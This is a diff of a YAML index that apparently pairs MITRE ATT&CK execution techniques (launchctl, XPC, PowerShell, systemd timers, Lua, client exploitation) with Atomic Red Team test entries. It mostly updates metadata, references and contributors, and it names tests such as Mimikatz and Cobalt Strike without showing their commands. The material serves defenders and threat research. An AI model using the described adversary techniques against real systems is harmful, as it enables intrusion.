     atomic_tests:
     - name: ExecIntoContainer
@@ -53757,32 +54064,7 @@ execution:
         elevation_required: false
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -53791,6 +54073,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -53803,19 +54086,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests:
     - name: Launchctl
@@ -53882,7 +54188,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -53898,72 +54204,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -53971,7 +54280,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -53986,7 +54299,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -54013,6 +54326,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -54023,15 +54340,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -54048,7 +54369,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -54096,7 +54417,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -54129,7 +54450,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests:
     - name: Radmin Viewer Utility
@@ -54239,7 +54559,7 @@ execution:
           choco install -y 7zip
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -54300,8 +54620,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -54323,7 +54644,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests:
     - name: Mimikatz
@@ -54872,7 +55192,7 @@ execution:
         name: powershell
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -54950,9 +55270,8 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests:
     - name: Create Systemd Service and Timer
@@ -55068,7 +55387,7 @@ execution:
         name: sh
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -55126,7 +55445,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests:
     - name: Create and Execute Bash Shell Script
@@ -55502,31 +55820,7 @@ execution:
         elevation_required: true
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -55547,23 +55841,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests:
     - name: Cobalt Strike Artifact Kit pipe
@@ -55721,6 +56036,70 @@ execution:
 
           '
         name: command_prompt
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -55749,7 +56128,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -55776,8 +56155,6 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests:
     - name: Malicious Execution from Mounted ISO Image
@@ -55800,24 +56177,8 @@ execution:
         elevation_required: true
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -55834,9 +56195,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -55844,21 +56206,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
